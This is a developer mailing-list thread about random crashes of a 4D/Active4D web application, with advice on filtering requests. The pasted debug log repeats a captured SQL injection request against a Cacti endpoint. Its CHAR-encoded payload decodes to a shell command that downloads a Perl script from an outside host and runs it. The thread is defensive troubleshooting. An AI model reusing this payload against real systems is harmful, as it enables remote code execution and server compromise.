Stuart,
Has anyone else experienced this?
Yes, I have seen similar behavior in the past. I also recall that
Aparajita fixed some crashing problems due to these types of exploits,
but don't recall the version. Going to 4.0 might fix the problem.
Here is the bug tracker ticket:
http://tracker.aparajitaworld.com/tracker/view.php?id=675
Can I use the A4D_PreOnWebConnectionHook to filter these types of URLs
out?
Certainly give it a try. If you can create a "whitelist" of valid
requests, let those pass through, otherwise kick everything else back
with an error. Using A4D regular expressions can help with that...
What I like to do is put a web server in front of Active4D (WebSTAR or
Apache) and use their respective rewrite modules to filter legitimate
requests. That way the kind of stuff you've shown below never reaches
Active4D or 4D's web server.
-- Brad Perkins
Stuart Holroyd wrote:
We have been having what appears to be random crashes of our 4D / A4D
application. After finally getting the 4D Debug Log turned on and set
to 'detail', we have this at the end of the log.
Our application runs in this environment:
Server: IBM PC
4D: 2004.6 Volume Runtime
Web Server: 4D Web Server
Active 4D: 3.0.1b7 (we are switching to A4D 4.0 with the next major
release, due any day)
Has anyone else experienced this?
Can I use the A4D_PreOnWebConnectionHook to filter these types of URLs
out?
3012781 [6] cmd: SET COLOR (A4D_SORTSESSIONSTATS).
3012781 [6] cmd: SORT ARRAY (A4D_SORTSESSIONSTATS).
3012781 [6] cmd: Dec (A4D_UPDATESESSIONSTATS).
3012781 [6] cmd: Trunc (A4D_UPDATESESSIONSTATS).
3012781 [6] cmd: String (A4D_UPDATESESSIONSTATS).
3012781 [6] cmd: String (A4D_UPDATESESSIONSTATS).
3012781 [6] cmd: Char (A4D_UPDATESESSIONSTATS).
3012781 [6] cmd: String (A4D_UPDATESESSIONSTATS).
3012781 [6] cmd: String (A4D_UPDATESESSIONSTATS).
3012843 [7] webUrl: /cacti/cmd.php?1
1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,114,109,32,45,114,102,32,47,116,109,112,47,100,101,115,107,46,112,108,59,119,103,101,116,32,119,119,119,46,115,104,97,100,121,46,49,115,116,104,111,115,116,46,111,114,103,47,100,101,115,107,46,112,108,32,45,79,32,47,116,109,112,47,100,101,115,107,46,112,108,59,112,101,114,108,32,47,116,109,112,47,100,101,115,107,46,112,108,59,114,109,32,45,114,102,32,47,116,109,112,47,111,117,116,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*
11111
3012843 [7] onWebAuthentificationCall: /cacti/cmd.php?1
1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,114,109,32,45,114,102,32,47,116,109,112,47,100,101,115,107,46,112,108,59,119,103,101,116,32,119,119,119,46,115,104,97,100,121,46,49,115,116,104,111,115,116,46,111,114,103,47,100,101,115,107,46,112,108,32,45,79,32,47,116,109,112,47,100,101,115,107,46,112,108,59,112,101,114,108,32,47,116,109,112,47,100,101,115,107,46,112,108,59,114,109,32,45,114,102,32,47,116,109,112,47,111,117,116,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*
11111
3012843 [7] end_onWebAuthentificationCall
3012843 [7] onWebConnectionCall: /cacti/cmd.php?1
1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,114,109,32,45,114,102,32,47,116,109,112,47,100,101,115,107,46,112,108,59,119,103,101,116,32,119,119,119,46,115,104,97,100,121,46,49,115,116,104,111,115,116,46,111,114,103,47,100,101,115,107,46,112,108,32,45,79,32,47,116,109,112,47,100,101,115,107,46,112,108,59,112,101,114,108,32,47,116,109,112,47,100,101,115,107,46,112,108,59,114,109,32,45,114,102,32,47,116,109,112,47,111,117,116,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*
11111
3012843 [7] cmd: MESSAGES OFF (* ON WEB CONNECTION).
3012843 [7] cmd: READ ONLY (* ON WEB CONNECTION).
3012843 [7] cmd: ON ERR CALL (* ON WEB CONNECTION).
3012843 [7] cmd: SET BLOB SIZE (* ON WEB CONNECTION).
3012843 [7] cmd: ARRAY TEXT (* ON WEB CONNECTION).
3012843 [7] cmd: ARRAY TEXT (* ON WEB CONNECTION).
3012843 [7] cmd: ARRAY TEXT (* ON WEB CONNECTION).
3012843 [7] cmd: Secured Web connection (* ON WEB CONNECTION).
3012843 [7] cmd: ARRAY TEXT (* ON WEB CONNECTION).
3012843 [7] cmd: ARRAY TEXT (* ON WEB CONNECTION).
3012843 [7] cmd: GET WEB FORM VARIABLES (* ON WEB CONNECTION).
3012843 [7] plugInName: Active4D 3.0; cmd: A4D Execute 4D request
3012843 [7] plugInName: Active4D 3.0; externCall: -91.
---------------------------------------------------
Stuart Holroyd AKTIV Software Corporation
[EMAIL PROTECTED] http://www.aktiv.com
Tel: 250.658.6300
Fax: 250.658.6201
_______________________________________________
Active4D-dev mailing list
[email protected]
http://mailman.aparajitaworld.com/mailman/listinfo/active4d-dev
Archives: http://mailman.aparajitaworld.com/archive/active4d-dev/
_______________________________________________
Active4D-dev mailing list
[email protected]
http://mailman.aparajitaworld.com/mailman/listinfo/active4d-dev
Archives: http://mailman.aparajitaworld.com/archive/active4d-dev/
